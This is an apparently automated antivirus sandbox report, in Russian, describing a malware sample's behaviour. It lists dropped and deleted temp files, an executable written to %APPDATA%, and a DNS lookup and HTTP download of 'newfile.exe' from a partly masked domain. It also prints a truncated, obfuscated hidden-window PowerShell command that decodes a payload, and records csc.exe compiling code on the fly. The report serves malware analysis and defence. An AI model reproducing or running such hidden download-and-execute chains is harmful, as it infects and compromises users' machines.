Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function m52823 {param($d6a4aa2)$ve13a8='ed74446';$q5b9f='';for ($i=0; $i -lt $d6a4aa2.length;$i+=2){$wa5fab4=[convert]::ToByte($d6a4aa2.Substring($i,2),16);$q5b9f+=[char]...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\o3tfxbn0.0.cs
- %TEMP%\o3tfxbn0.cmdline
- %TEMP%\o3tfxbn0.out
- %TEMP%\csc1772.tmp
- %TEMP%\res1782.tmp
- %TEMP%\o3tfxbn0.dll
- %APPDATA%\lbf115.exe
Удаляет следующие файлы
- %TEMP%\res1782.tmp
- %TEMP%\csc1772.tmp
- %TEMP%\o3tfxbn0.pdb
- %TEMP%\o3tfxbn0.cmdline
- %TEMP%\o3tfxbn0.0.cs
- %TEMP%\o3tfxbn0.dll
- %TEMP%\o3tfxbn0.out
Сетевая активность
TCP
Запросы HTTP GET
- http://en###pastri.com/newfile.exe
UDP
- DNS ASK en###pastri.com
- DNS ASK pa###bin.com
Другое
Создает и запускает на исполнение
- '%APPDATA%\lbf115.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function m52823 {param($d6a4aa2)$ve13a8='ed74446';$q5b9f='';for ($i=0; $i -lt $d6a4aa2.length;$i+=2){$wa5fab4=[convert]::ToByte($d6a4aa2.Substring($i,2),16);$q5b9f+=[char]...' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\o3tfxbn0.cmdline"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES1782.tmp" "%TEMP%\CSC1772.tmp"' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\o3tfxbn0.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES1782.tmp" "%TEMP%\CSC1772.tmp"
